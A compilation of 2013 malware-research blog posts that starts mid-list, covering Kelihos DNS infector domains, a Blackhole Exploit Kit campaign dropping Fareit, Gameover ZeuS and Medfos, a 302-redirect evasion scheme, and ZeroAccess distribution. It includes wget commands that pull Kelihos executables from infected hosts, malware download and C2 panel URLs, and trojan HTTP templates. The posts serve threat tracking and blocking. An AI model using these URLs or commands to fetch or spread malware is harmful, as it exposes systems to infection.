WYMCEKIN.RU,, ns[1-6].osikkid.com
XUBQOBOH.RU,, ns[1-6].osikkid.com
XUVGYSCI.RU,, ns[1-6].osikkid.com
XYBYHCYZ.RU,, ns[1-6].osikkid.com
XYTFYRSU.RU,, ns[1-6].osikkid.com
ZAGTYCAM.RU,, ns[1-6].osikkid.com
ZEVIJAEF.RU,, ns[1-6].osikkid.com
ZUCFIZME.RU,, ns[1-6].osikkid.com
ZUQTIZYH.RU,, ns[1-6].osikkid.com
ZYCPOHDU.RU,, ns[1-6].osikkid.com
ZYVMYSXA.RU,1.168.215.194, ns[1-6].osikkid.com
Belos is the official information received from GroupIB for SUSPENSION of 100 another domains Kelihos we reported, which was swiftly followed in less than 48 hours! :-) 
Dear Partners,

Group-IB CERT (CERT-GIB) has suspended the following domains:

 acbimnik.ru
 ajwablet.ru
 albodlyc.ru
 aqxiwtil.ru
 avdicsuw.ru
 awpavdog.ru
 bevywcoc.ru
 bezekqen.ru
 bivozhij.ru
 cahmydjo.ru
 cyjukpym.ru
 cyknewyh.ru
 cyqsuxon.ru
 diijgyan.ru
 dyotukci.ru
 dyradleq.ru
 ejwopwyz.ru
 ekredtef.ru
 eqgyqtad.ru
 evlyltux.ru
 fibloqaf.ru
 finqimig.ru
 fohkyquw.ru
 fowajkug.ru
 fybynkeq.ru
 fydiwgaz.ru
 fygjugli.ru
 fyjtihox.ru
 fytuctox.ru
 gegdyrag.ru
 gegmulad.ru
 genuvbiz.ru
 gizrosca.ru
 guqidruv.ru
 hamovlox.ru
 hazlyduw.ru
 hihfelgo.ru
 hiilosab.ru
 hikkinuf.ru
 hokkinyf.ru
 ivkeuhuw.ru
 ixcupdam.ru
 jibdefup.ru
 jixudrer.ru
 juqutsaf.ru
 jurlyqyr.ru
 juvbebec.ru
 jyhvycli.ru
 jyshiwik.ru
 kanruqyc.ru
 kejikkib.ru
 lawnupas.ru
 lenevryp.ru
 lifnagci.ru
 lilxajte.ru
 medulzal.ru
 mojjiquf.ru
 mubyblaz.ru
 nadkewlo.ru
 neqajdac.ru
 nujojpal.ru
 pabobbah.ru
 pelvojel.ru
 peqinnir.ru
 pigovfij.ru
 pymsiliq.ru
 qaqiqgod.ru
 qegyrdad.ru
 qehwocsi.ru
 ralymebu.ru
 rawpenep.ru
 razcamit.ru
 retucwyx.ru
 rihsycvo.ru
 rizomcof.ru
 rycnisav.ru
 rygxuqyf.ru
 seczypry.ru
 sepoilok.ru
 sipvaqbe.ru
 sokxenby.ru
 terujbih.ru
 tyvwuqal.ru
 udpycbel.ru
 uhhuwteg.ru
 ujdogvic.ru
 uqebenew.ru
 vesykvel.ru
 vuvsimxo.ru
 wymcekin.ru
 xubqoboh.ru
 xuvgysci.ru
 xybyhcyz.ru
 xytfyrsu.ru
 zagtycam.ru
 zevijaef.ru
 zucfizme.ru
 zuqtizyh.ru
 zycpohdu.ru
 zyvmysxa.ru

3. How we PoC an NS infector in commercial TLD

This is how we always PoC the new infector in the wild, we share this as a know how for everyone to help to be able to spot and report the new infection, we use our PoC for OSIKKID.COM as per below: 

'(1) Spreads the HLUX as per below checks:'

bash-3.2$ date
Thu Aug  8 12:57:18 JST 2013

// the HLUX IP..

bash-3.2$ while true; do dig +short OSIKKID.COM; sleep 1; done
119.14.28.104
218.166.2.199
125.215.84.135
77.123.42.134
183.72.199.4
36.234.222.167
114.38.198.134
117.197.230.88
95.30.210.87
160.75.9.240
46.250.101.113
175.111.40.232
46.250.99.105
[...]

'(2) Serving Payload malware of Kelihos'
and every A records is serving Kelihos payload:
// Below is the currently download PoC:

bash-3.2$ while true; do wget h00p://OSIKKID.COM/rasta01.exe; sleep 1; done
--2013-08-08 12:59:14--  h00p://osikkid.com/rasta01.exe
Resolving osikkid.com... 89.136.131.41
Connecting to osikkid.com|89.136.131.41|:80... connected.
HTTP request sent, awaiting response... 200 
Length: 1221261 (1.2M) []
Saving to: ‘rasta01.exe’
100%
Last-modified header invalid -- time-stamp ignored.
2013-08-08 12:59:22 (260 KB/s) - ‘rasta01.exe’ saved [1221261/1221261]

--2013-08-08 12:59:42--  h00p://osikkid.com/rasta01.exe
Resolving osikkid.com... 124.111.249.204
Connecting to osikkid.com|124.111.249.204|:80... connected.
HTTP request sent, awaiting response... ç200 
Length: 1221261 (1.2M) []
Saving to: ‘rasta01.exe.2’
Last-modified header invalid -- time-stamp ignored.
2013-08-08 12:59:53 (1003 KB/s) - ‘rasta01.exe.2’ saved [1221261/1221261]
  [...]

'(3) INTERNET.BS registration is current MO.'
It is proven behind the registration process of this domains
We tried to remotely extracted the registrar: INTERNET.BS released 
domain from current day until Jun the 1st, and this domain is one of it:

bash-3.2$ whois osikkid.com
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
   Domain Name: OSIKKID.COM
   Registrar: INTERNET.BS CORP.
   Whois Server: whois.internet.bs
   Referral URL: http://www.internet.bs
   Name Server: NS1.OSIKKID.COM
   Name Server: NS2.OSIKKID.COM
   Name Server: NS3.OSIKKID.COM
   Name Server: NS4.OSIKKID.COM
   Name Server: NS5.OSIKKID.COM
   Name Server: NS6.OSIKKID.COM
   Status: clientTransferProhibited
   Updated Date: 06-aug-2013
   Creation Date: 18-jun-2013
   Expiration Date: 18-jun-2014
>>> Last update of whois database: Thu, 08 Aug 2013 04:03:30 UTC <<<

'(4) The linked DNS services used with the previous Kelihos reported NS services:'

The NS1. of this domains is linked with the same NS as previous reported:
ns1.OSIKKID.COM = ns3.davujuz.com
ns2.OSIKKID.COM = ns5.ns4, ns2.ns4.ombugew.com
ns3.OSIKKID.COM = ns1.davujuz.com
...and so on...

'(5) The infection raised in RU are causing by OSIKKD.COM NS server:'
The 100 domains RU are needed to be blocked with the same pattern as we previously reported to Group IB, under REGGI.RU, (and FYI the abuse of the RU by the kelihos is more than 12,000 domains not included this one... )
This is the PoC that the domains of RU was registered 24hrs more under the OSIKKD.COM NS :
domain:        ACBIMNIK.RU
nserver:       ns1.osikkid.com.
nserver:       ns2.osikkid.com.
nserver:       ns3.osikkid.com.
nserver:       ns4.osikkid.com.
nserver:       ns5.osikkid.com.
nserver:       ns6.osikkid.com.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2013.08.06
paid-till:     2014.08.06
free-date:     2014.09.06

Below is the check of the reported RU affiliated by the NS of the OSIKKID.COM crossed by the IP and DNS:

ACBIMNIK.RU,,      ns1.osikkid.com.
      ns2.osikkid.com.
      ns3.osikkid.com.
      ns4.osikkid.com.
      ns5.osikkid.com.
      ns6.osikkid.com.
AJWABLET.RU,123.240.108.221,      ns1.osikkid.com.
      ns2.osikkid.com.
      ns3.osikkid.com.
      ns4.osikkid.com.
      ns5.osikkid.com.
      ns6.osikkid.com.
ALBODLYC.RU,,      ns1.osikkid.com.
      ns2.osikkid.com.
      ns3.osikkid.com.
      ns4.osikkid.com.
      ns5.osikkid.com.
      ns6.osikkid.com.
[...]

4. Monitoring The Actual Infection Range

As per today before the NS sinkholing on effect, with the great effort of our members we monitor the infection of the 1,287 IP address actively distributing Kelihos malware payload all over the world as per listed in our pastebin here-->>[LINK]

You can add the /rasta01.exe after the IP to get the latest Kelihos sample payload for your research purpose, as per below sample:

The below binary files also can be used for the same monitoring purpose: 

/keybex4.exe
/bljat01.exe
/cuper01.exe
/rasta01.exe
/calc.exe

These infection is plotted in the good graphical interface by Chris J Wilson as per below:

Infection based per ASN:




Infection based by country:


Prologue

The effort is not stopping now.. see below:

And what a FAST action from our friends!! See the time stamp in the tweets, it is AMAZING to suspend & sinkhole malware domains THAT fast! :-)) (you guys rocks!!)
We work hard on trying to break this "Kelihos" legend methodologically and the method works!
Don't ever let the Kelihos scums enter the internet! Spot & stop them instantly, cooperate with the abused registrar to get the new infectors go to sinkholes and to suspend those new domains instantly.
They weakness is in their DNS, these services backboned their payload distribions of thousands IP and infector domains. And those DNS are using static addresses of un-removeable machines. This IS a target to be shutdown!
Thus, DO NOT let those NS getting any domains in our internet! Is not easy to shift their DNS, it hurts them very bad, they just change the name server domains time after time. And right now they need to have a non-RU domains for their DNS to survive their botnet longer.
Let's build the procedure to SPOT, BLOCK, SUSPEND & CLEAN-UP in one flow altogether!
We need your help, your support in coordination with Kelihos botnet's suppress effort. Please cooperate!

#MalwareMustDie!

How Greedy Cyber Scums are.. Leaked Spam Plan & Triple Payload Hits of "Syria Campaign"

September 9, 2013, 6:20 am
$
0
0
We've been in a good undercover coordination on fighting comeback botnet (still on it-->HERE) when we spotted this threat. It's related to recent event and malvertisement so I thought better to share this information. On the 1st September 2013 during our monitoring, we intercepted a communication within one scum into another, with the message as per follows:
Evaluating the authenticity of the message and understanding the specific spam template used and the urgency of the threat we sent "check your perimeter" warning to all group of researchers that we could reach. This is a definitely spooky encouragement message for an attack that the ring of cyber scums were going to hit.

On early September some of our friends started to spot (i.e.-->HERE) the related threat, and on September 7th I personally received the sample in my honeypot as per below full email snapshot:

Email header is shown the following data:

It shows us a 100% plastic surgery of faking relay data, if I may explain as follows; the first line it fakes the facebook envelop-from data(used to be grabbed via HELO), supported by the line #7, the fake SMTP HELO communication trace. We will see also the fake email client signature shows in header part of "User-Agent", we've seen this fake MUA data in many spams of BHEK before too.

We see also a fake local network relay data with the lame Message-ID generated by fake Microsoft SMTP server, why is it lame? Because they use same strings in most of the similar spams sent recently. Furthermore, you'll see the line 7 & 9 written IP address of 2.180.28.90, which in my opinion wasn't close to reality either, judging by the below lookups that ending up to Iran/Teheran network, which reminds me the DoD network case (link-->HERE)faked by the same malvertisement: 

inetnum:        2.180.16.0 - 2.180.63.255
netname:        tckhr-DSL
descr:          Telecommunication Company of Khorasan Razavi for ADSL users
country:        IR
admin-c:        JS10218-RIPE
tech-c:         JS10218-RIPE
status:         ASSIGNED PA
mnt-by:         AS12880-MNT
source:         RIPE # Filtered

person:         Jamil Sabaghi
address:        Khomeini ST Mashhad Iran
phone:          +98 511 604 44 40
nic-hdl:        JS10218-RIPE
mnt-by:         AS12880-MNT
source:         RIPE # Filtered
But yet, there is still also a possibility of the infected machine by SpamBot in that address, it's to be checked by local authority since I won't be fooled by this scum and have no interest to fire my nmap to that direction during this "heat up" political season. BTW the "faking" of the MessageID (see no 3), and also fake MUA data (no 4), are the typical work of the SpamBot, suspected the work of Cutwail spambot template.

The email has one link that pointing into a malicious infector site which as per shown in the bottom of email snapshot above, the domain name of hosannacapital.com.pa is a recent well-known Blakhole infector URL of a hacked site with long history of blackhole infection during past months-->HERE, the Robtex diagram below is proofing the dedicated usage of the IP that supporting the theory:

But yet, the infection coming from this IP (72.47.232.23) is quite rapid, it will do you no harm to block the IP address and the below domains to prevent infections: 

hosannacapital.com.pa
hosannavision.org
imap.hosannavision.org
mail.hosannavision.com
mail.www.hosannavision.org
pop.www.hosannavision.org
smtp.hosannavision.com
smtp.hosannavision.org
smtp.www.hosannavision.org

Back to the time line of infection, a good report by Umbrella Security Graph tool providing me the first time and the peak of current threat's infection occured via the infector domains as per follows:

This explains the access from the PC for infection in timing which is matched to the malvertisement used.

Moving on, back to the URL of the infector, which ending up contains of multiple .JS javascript file's links coded in the index.html (as usual BHEK infector scheme), we went throgh same writing dozen times so I am not going to be into details for this matter, shortly, the inside of .JS files is written one single link that ending up into a Blackhole Exploit Kit landing page below: 

luggagepreview .com/topic/able_disturb_planning.php
Again for confirming the infection timing I checked the landing page's domain DNS query request via Umbrella Security Graph below:

The result is suggesting me this malvertisement "possibility" of infection's timeline.

Seeking further into the IP address used for this blackhole in passive DNS, it was also recorded the other 12 domains of the same IP which having malware requests as per below details (I share this for the blocking purpose, in case you didn't have it yet): 

londonleatheronline.com
londonleatherusa.com
luggage-tv.com
luggagecast.com
luggagepreview.com
dai-li.info
dyweb.info
expopro.info
luggagejc.com
luggagepoint.de
luggagewalla.com
yesrgood.info
Well OK, then what does this BHEK do?

The Story of Exploitation and Infection

I used the method of applet access that must have been written in the landing page to make it guides me to the exploit infector, I picked this method since I know the java infection is a kind of "HOT" in he BHEK trend recently, hopefully will see something new stuff to break. Tweaking with your preferred fetcher you'll get this jar if you do it right, my log as PoC: 

  :
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 09 Sep 2013 07:01:51 GMT
Content-Type: application/java-archive
Connection: keep-alive
Content-Length: 22553
X-Powered-By: PHP/5.3.14-1~dotdeb.0
ETag: "e21e49a30bd84a1d042602ba446aceb0"
Last-Modified: Mon, 09 Sep 2013 07:04:00 GMT
Accept-Ranges: bytes
  :
200 OK
Length: 22553 (22K) [application/java-archive]
Saving to: `java1.jar'
2013-09-09 16:05:27 (70.8 KB/s) - `java1.jar' saved [22553/22553]
As I expected, the low detection in VT -->LINK
URL: https://www.virustotal.com/en/file/20811157e12152bd262710b5b743ddf60857c3cd157e4f64ea2e6f4fd8ee8eaf/analysis/1378711326/
SHA256: 20811157e12152bd262710b5b743ddf60857c3cd157e4f64ea2e6f4fd8ee8eaf
SHA1:  370acfc6bf26d9e4761586cc634382a517e4baaf
MD5:  e21e49a30bd84a1d042602ba446aceb0
File size:  22.0 KB ( 22553 bytes )
File name:  java1.jar
File type:  ZIP
Detection ratio:  4 / 47
Analysis date:  2013-09-09 07:22:06 UTC ( 0 minutes ago ) 

Kaspersky           UDS:DangerousObject.Multi.Generic 
McAfee              Suspect-BO!Exploit-JAR
McAfee-GW-Ed.       Suspect-BO!Exploit-JAR 
Sophos              Mal/ExpJava-U
Had my fun in decompiling this jar by facing the error below:

Yes it suppose to prevent decompilation, see this reference-->HERE, to make me bumping into the interesting concept of applet loading within Main.class:

Shortly, some hours in manual decoding to solve the strings one by one, I burped the below strings to confirm this jar as CVE-2013-0422, your reference is -->HERE
com.sun.jmx.mbeanserver.Introspector
javax.management.MbeanServerDelegateboolean
getMBeanInstantiator
com.sun.jmx.mbeanserver.JmxMBeanServer
newMBeanServer
↑this is at least what I fetch via my method, there could be more others jar with other CVE too. I must say some comments up to this moment as follows, the usage of obfuscation method of the jar is also not a commonly I saw, loading applet object from a class, the anti-debugging fnction, the horrible obfuscation. Without pcap that help guided me testing some result I don't think I can manage to crack this one in such a short time..

Anyway, the post is long, so let's move on: To the deeper more disappointment is, this is all only to burp this a very well known fake adobe url below :-/ - sorry, I can't expose more than this at the moment. 

[domain][root-dir] /adobe/update_flash_player .exe

The Payload Story

Fetching the first level payload, it was tricky effort. Forget the URLqery tricks, doesn't work that way. You must follow the route of infection I described above well to put the correct parameter to fetch this payload, then you will get this: 

GET /adobe/update_flash_player.exe HTTP/1.0
Host: luggagepreview.com
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 09 Sep 2013 07:27:08 GMT
Content-Type: application/octet-stream
Connection: keep-alive
Content-Length: 115712
Last-Modified: Mon, 09 Sep 2013 07:25:01 GMT
Accept-Ranges: bytes
 :
200 OK
Length: 115712 (113K) [application/octet-stream]
Saving to: `update_flash_player.exe'
2013-09-09 16:31:12 (3.99 KB/s) - `update_flash_player.exe' saved [115712/115712]
The payload is the Trojan PWS Win32/Fareit, and by reversing method we can figure URL of what other malware to be downloaded by this trojan: 
h00p://imagesuperspot.com/6ptP.exe
h00p://1954f7e942e67bc1.lolipop.jp/d2z.exe
h00p://ropapublicitaria.es/5VWumA1.exe
h00p://colombiantravelservices.com/ucUMruv.exe
And posting the infected PC's data into the below panels: 
h00p://luxurybrandswalla.com/forum/viewtopic.php
h00p://mickmicheyl.biz/forum/viewtopic.php
h00p://mickmicheyl.ca/forum/viewtopic.php
h00p://mickmicheyl.com/forum/viewtopic.php
↑Please see the above domains well. We have the well-known findings of fake adobe updater served in these urls way beforehand: 
mickmicheyl .biz/chrome
mickmicheyl .biz/adobe
mickmicheyl .ca/chrome
mickmicheyl .ca/adobe
mickmicheyl .com/chrome
mickmicheyl .com/adobe
luxurybrandswalla .com/chrome
luxurybrandswalla .com/adobe
The HTTP header used for download is this template: 
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
GET %s HTTP/1.0
Host: %s
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: %s
and the POST command is using this template: 
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: %lu
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: %s
Content-Length:
Location:
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
GetNativeSystemInfo
The Virus Total scan result of this payload: -->LINK
URL: https://www.virustotal.com/en/file/87470e30daee6c01abc7c6f5411356dad1350db215b856e69d78cd728bc28458/analysis/1378712207/
SHA256: 87470e30daee6c01abc7c6f5411356dad1350db215b856e69d78cd728bc28458
SHA1:  1c6780add9bfda83bafbfa349ddc91d4eb709a51
MD5:  117efa2ab14ef1623b7889a4bb9100e3
File size:  113.0 KB ( 115712 bytes )
File name:  sample
File type:  Win32 EXE
Tags:  peexe
Detection ratio:  11 / 47
Analysis date:  2013-09-09 07:36:47 UTC ( 11 minutes ago ) 

BitDefender           Gen:Variant.Zusy.60090 
Comodo                Heur.Packed.Unknown 
Emsisoft              Gen:Variant.Zusy.60090 (B) 
F-Secure              Gen:Variant.Zusy.60090 
Fortinet              W32/Kryptik.BDPK!tr 
GData                 Gen:Variant.Zusy.60090 
Malwarebytes          Trojan.FavLock 
McAfee                BackDoor-FBFW!117EFA2AB14E 
McAfee-GW-Ed.         Heuristic.LooksLike.Win32.Suspicious.B 
eScan                 Gen:Variant.Zusy.60090 
Symantec              Suspicious.Cloud.5
↑None of the result said Fareit...You can see the more details of this trojan in my previos post-->HERE and HERE.

Below is the PoC in PCAP about the downloaded and posted URLs:

Second payloads: Gameover & Medfos..

These are the second level payloads:

So what are these payloads?
There are two types of secondary payloads there, the blue icon ones is peer-to-peer ZeuS variant, the Gameover. And the one with the exclamation icon is Win32/Medfos, I uploaded them both in Virus Total as per below report:

Trojan Zeus P2P Variant/Gameover -->LINK

URL: https://www.virustotal.com/en/file/be256dc175599524fa65bcf7263de3065658a86ee21184b59671a3c0fd9b05f1/analysis/1378716742/
SHA256: be256dc175599524fa65bcf7263de3065658a86ee21184b59671a3c0fd9b05f1
SHA1:  22f2bd96982e479236d81dc0487ab755b57f26c7
MD5:  acab07b3eb59a7b2e9ee66f1eef7e761
File size:  297.0 KB ( 304128 bytes )
File name:  edebk.exe
File type:  Win32 EXE
Detection ratio:  6 / 46
Analysis date:  2013-09-09 08:52:22 UTC ( 0 minutes ago ) 

Fortinet           W32/Kryptik.BDPK!tr 
Malwarebytes       Trojan.FavLock
McAfee             FakeSecTool-FAZ!ACAB07B3EB59 
McAfee-GW-Edition  Heuristic.LooksLike.Win32.Suspicious.B 
Symantec           Suspicious.Cloud.5 
VIPRE              Trojan.Win32.Winwebsec.ia (v)
↑and none of the above mention the ZeuS/Gameover. Below is the P2P's PoC:

Trojan downloader Win32/Medfos: -->LINK

URL: https://www.virustotal.com/en/file/5baf297dc80f807182b46b189e9df87d5397f728ba93758ac68ece59355cfdba/analysis/1378717111/
SHA256: 5baf297dc80f807182b46b189e9df87d5397f728ba93758ac68ece59355cfdba
SHA1:  13bc3d1c1a24e4e0c4753d0bd83c10c783609614
MD5:  d9a50ae2c4bed7a59d8bed0c1320a068
File size:  210.5 KB ( 215552 bytes )
File name:  ucUMruv.exe
File type:  Win32 EXE
Detection ratio:  6 / 47
Analysis date:  2013-09-09 08:18:58 UTC ( 39 minutes ago ) 

ByteHero           Trojan.Malware.Obscu.Gen.002 
Comodo             MalCrypt.Indus! 
Fortinet           W32/Medfos.IOE 
Malwarebytes       Trojan.Medfos.RRE 
Norman             Medfos.JMP 
VBA32              SScope.Trojan.Midhos.2513
↑four of six products is doing a good work in detecng this Win32/Medfos Trojan Downloader.

The mistery of the third level of payload

The medfos is trying to fetch the third level of payloads from some URLs i.e.: 
Host: www.01net.com
Method: HTTP/1.1 GET
URL: GET /uploading/id=1083243553&u=4WSbvjA+sJYdbjvNmxr6tWHxLtArmTtrSHvRwRLcacviRtnYIg2xc6QMAWYaZM4RqxalcusDRHEPVjzpf+v2xg==
Too bad (which is a good news indeed!) the file was removed↓

Samples

As always, a share for research purpose & raising the detection ratio:

Please mention to @malwaremustdie for password.

Hall of Fame

I thank my friends who stick together in course than we are doing. Thank you ‏@Malwageddon for the solid teamwork, @markusg for the advice & hints. @DhiaLite for introducing us to a new good useful tool, to @ConradLongmore for quick reference to I can confirm the findings, for all OP-kelihos team members.. you guys rocks! At @sempersecurus for the great patience, and all #MalwareMustDie team & friends for standing still side by side in battling malware together. To Umbrella Security Graph for the chance to use the good tool, link-->HERE

Comments:

In the end, this malicious campaign using the the political situation itself is already bad enough, we think of the an-usual scheme judging by the well-made spam template..all payloads are very low detection ratio.. medfos backends for the third infection layer from file uploader service..and it stings us to the short term of event.
We hope that US and Russia political heat will cool down soon. The more heat raise, the more similar news/event come with more worst malware infection chances that those scums will use to hit our innocent victims..

#MalwareMustDie!

302-Redirector - A (new?) "Cushion Attack", an Attempt to Evade IDS/IPS Signature

September 21, 2013, 4:31 am
$
0
0
This is a quick post, of current on going web-driven malicious web traffic redirection threat with high possibility to malware infection. I was supervising some surveillance operations for one and a half month straight so I probably don't know recent progress whether any researchers already cover this, but since there many links for this threat raising up now, I dare myself peeling & exposing this threat for the awareness purpose. For the IDS/IPS industry this reading is a must read, for I am sure there is no coincidence regarding to this new phenomena in web threat.

It's all started from an "Angel" (thank you so much!) who hinted me with the bunch of interesting URLs:

Since there is a possibility the hash will change, so practically it can be described with the regex below:

For confirming the regex above and the result, you can check it out in the URLQuery (w/thanks friends, can't research this well without your site!) in-->HERE

Seeing the url status, some of them are cleaned up stuffs (which is VERY GOOD), so I went to the "difficult to cure" sites to check the origin and native of the threat, and found the "alive" redirection base by the fake HTTP 302 error as per I captured below:

If we go all the way along with the list, (if the sites are alive) all we will see is the same fake 302 pages with redirection via their each link, deeper investigation confirming me these are URL redirectors with what looks like a given exact condition.
The challenge came by when you trace them one by one... here we go:

Threat Explanation

If you see in the picture about the one with the end page of kee.php is a CookieBomb threat, which can be set to go anywhere, you can see our previous post of the CookieBomb-->HERE, kindly bear me not to explain it further here.

One of the URL made be bump straight ahead to the RedKit URL:

One link I trace activating the "like" script in facebook account implanted in a RBN domain, a highly suspicious domain:

With the script linked to PNG facebook icon downloaded below:

One request I followed redirect me into a TDS scheme that forwarding and forwarding me until ending up in Ukraine "hosting service" site (to make it short. I cut some http conversation)

And so on..

What are these? What's the purpose?

Is not easy to explain this threat, I checked around 60-70 urls just now, come into a conclusion that these are a cushion that is used for evade web filtration/URL of IDS/IPS alerts for the following web driven attacks designed by the bad actors behind it. By the suspension of the redirection using the URL written in the 302 fake page, the response from victim; to click the link mentioned to continue the flow of redirection/infection to next hop of the threat's site/URL; is needed.

This new layer made by these 302 redirection will add the link of threat chain, that's why I called it as a new "cushion for the further threat that come along behind it, I made simple graph for better understanding below:

Proof of Concept

I collected/posted myself some urls for investigation of this case, also with other researchers posts also in there, that (again) can be seen in the URLQuery page mentioned above. The screenshot is as follows:

If you see the Alert in IDS/IPS column, it shows the very low detection of these 302 pages, the evading was working as per expected by the scums who's planning these. I call this threat as "302-Redirectors" (as per it is..*smile*) to be use for the future reference.

If you see the end-point of the redirection and infection that can be caused by this threat, I do not surprise if the CookieBomb, RedKit and Kelihos people is behind this.

The Multiple Redirection Possibility

Speaking of the devil, the CookieBomb & TDS spread to infect Reveton that @kafeine (with thank's so much for the post) mentioned in his blog in-->HERE, contains a video demonstration of the malicious tool used to do mass-hack of exploited sites, code injection and monitoring the implemented TDS spread.

Since we know for sure that the 302-Redirectors (in short: 302redir) was created by the same actors behind the CookieBomb (and also RedKit EK and Kelihos), and in that video; as per proven in many CookieBomb hacked sites; we will know there is exist the conditional switch to be used to make multiple URL redirection happens.

You can also see in the below snapshot taken during the video running, that two URLs for forward/redirection was burped out via Jabber-base bot used in one thread of an injection scheme, it presents multiple redirection logic exists behind the tools mentioned, pic (click to enlarge):

To PoC the theory of multiple redirection is not so hard once we know how the usual threat of these types works. Our member of the development/coder department is making a very good PoC for the multiple forwarder to be used in 302 Redirector threat s per below capture:

We are terribly sorry, we can not release the whole PoC code for security reason yet, we promise to relese the code to known researchers only after threat alert level become lower.

Samples

These are the samples that I received and analysed, you can view the urls safely here-->HERE

Please be save friends, I hope this short story of awareness helps.

#MalwareMustDie!

...And (again!) ZeroAccess/Sirefef is NOT Dead (yet!)

October 7, 2013, 5:14 am
$
0
0
Is a straight to the point post, for ZeroAccess reference there was posted previously-
in -->HERE and-->HERE. Please bear for I will not include the previous exposed details.

Background

Again, do not believe on what you read without checking, like this AV marketing issue-->HERE
The post is without any technical analysis background specifically of the threat's sample on its malicious PoC, nor the share information of the verdicted subject's hashes. Not to mention the "huge intolerable research term miss" by mistaking ZeroKit(root/boot kit) as ZeroAccess..=sigh=
I wrote the above statement as a productive criticism to demand an improvement and a fix on current technical level of quality insurance form a technical post that coming from a "reliable""big brand" in security industry which many people count, trust and generously pay in yearly basis for its licenses.
And additionally, in the country where I live and grow, if such vendor, if a maker made such mistake, it will be a press conference to make public apology to restore the trust of the market back, which in this case the appointed security maker is not. If in my company, the person in charge for those errornous "technical white paper" will be fired for sure!

This post is a PoC to counter the statement that says that "ZeroAccess was 50% neutralized" from a same maker appointed above. Is actually a lesson to all of us to be more criticized on such statement, specially to the one who has not publicly announce its blocking list, samples of what had been blocked, and so on. What we have found shows that ZeroAccess is out there active in distribution in same volume of P2P or domains, and improving its malicious act by using accompanied trojans. My question is simple: "What had been blocked???"< You all have your right judge it yourself after reading the below details.

Just when I hope to find alive PoC of ZeroAccess (or Sirefef), our crusader friend found it first and mentioned: VERY ALIVE:

Wasting no time, I went deep dive and surprised to the fact of what I found.


The Infection Source

The IP: 158.255.6 .116 is actively distributing ZeroAccess among other threats. URLQuery report is -->HEREBelow is Virus Total's passive DNS report for the IP Address, link is--->HERE

2013-09-27 [34]fseggs2.aasdgaa.info
2013-10-07 [35]gtrfeds.artisanent.info
2013-09-28 [36]mgthnse.artisanent.info
2013-09-27 [37]mscderg.artisanent.info
2013-10-07 [38]rewdert.aasdgaa.info
2013-09-27 [39]rsdfcs1.artisanent.info
2013-09-25 [40]swdasc1.aasdgaa.info
2013-09-28 [41]ytedvh2.artisanent.info
2013-09-26 [42]zdegfsg.artisanent.info
2013-09-28 [43]ztgdbsw.artisanent.info
List of the downloaded URL: 
6/38 2013-10-07 01:35:29 h00p://rewdert.aasdgaa.info/explorer.exe
7/38 2013-10-07 01:33:38 h00p://gtrfeds.artisanent.info/m.exe
2/39 2013-09-28 11:16:46 h00p://mgthnse.artisanent.info/
7/39 2013-09-28 11:16:52 h00p://ztgdbsw.artisanent.info/z.exe
5/39 2013-09-28 10:16:18 h00p://mgthnse.artisanent.info/m.exe
2/39 2013-09-28 10:16:11 h00p://ytedvh2.artisanent.info/zs.exe
10/39 2013-09-27 13:15:46 h00p://mscderg.artisanent.info/m.exe
2/39 2013-09-27 11:56:04 h00p://ytedvh2.artisanent.info/z.exe%5B/code%5D
5/39 2013-09-27 11:29:16 h00p://ytedvh2.artisanent.info/z.exe
3/39 2013-09-27 02:35:59 h00p://rsdfcs1.artisanent.info/m.exe
2/39 2013-09-26 11:41:46 h00p://fseggs2.aasdgaa.info/iexplorer.exe
3/39 2013-09-26 11:35:55 h00p://zdegfsg.artisanent.info/z.exe
1/39 2013-09-25 21:17:10 h00p://mscderg.artisanent.info/
Strong verdict of hashes: 
15/48 2013-10-07 01:35:46  [57]67e11fab0bff36a256e003b00658e11e9ef68c07bd30279ba2dc5da0c8379fee
29/45 2013-10-07 01:34:41  [58]9dcbb64f365fdf6f80607d297d88134efa4a74ebadc3cc3c5effa9c4f8625937
25/48 2013-09-28 11:16:54  [59]b9e7adce23242e501ad04fd3c8dec6feeaddee9a7ef799879ffbaf9f6b67f594
4/48 2013-09-28 10:16:54   [60]6369f432a8383b3e802c2db0f69503f09bd047ddbe02d4fe971826c8ac29adfb
17/48 2013-09-27 13:16:32  [61]4c42befd1f6392339f6a4333642ad3a27ca16312616c83eb2586de63b275faae
16/48 2013-09-27 02:45:46  [62]c0b1fac70a57c7b23c4640d7049cbb91890d650bbfdf44e02143ba3e8c9038b5
8/47 2013-09-26 11:41:59   [63]dc5f3a223bf9a2ea3131a218472a3dfd2dfc9d628476e85376570d91c8ddcc4a
While OpenDNS recorded also the infection requests to the below domains: 
huyftdr.artisanent.info
rewdert.aasdgaa.info
jihuyg1.aasdgaa.info
egthyrf.aasdgaa.info
hytgder.artisanent.info
ztgdbsw.artisanent.info
mgthnse.artisanent.info
rsdfcs1.artisanent.info
fretsdf.aasdgaa.info
grsjli1.aasdgaa.info
mscderg.artisanent.info
zdegfsg.artisanent.info
fseggs2.aasdgaa.info
gedsetu.aasdgaa.info
swdasc1.aasdgaa.info
It is all served in HOSTKEY.RU 
inetnum:        158.255.0.0 - 158.255.7.255
netname:        RU-HOSTKEY-20111114
descr:          Mir Telematiki Ltd
country:        RU
org:            ORG-MTL21-RIPE
admin-c:        PC7356-RIPE
tech-c:         PC7356-RIPE
tech-c:         PC7356-RIPE
status:         ALLOCATED PA
mnt-by:         RIPE-NCC-HM-MNT
mnt-lower:      MTLM-MNT
mnt-routes:     MTLM-MNT
remarks:        abuse-mailbox: abuse@hostkey.com
source:         RIPE # Filtered

organisation:   ORG-MTL21-RIPE
org-name:       Mir Telematiki Ltd
org-type:       LIR
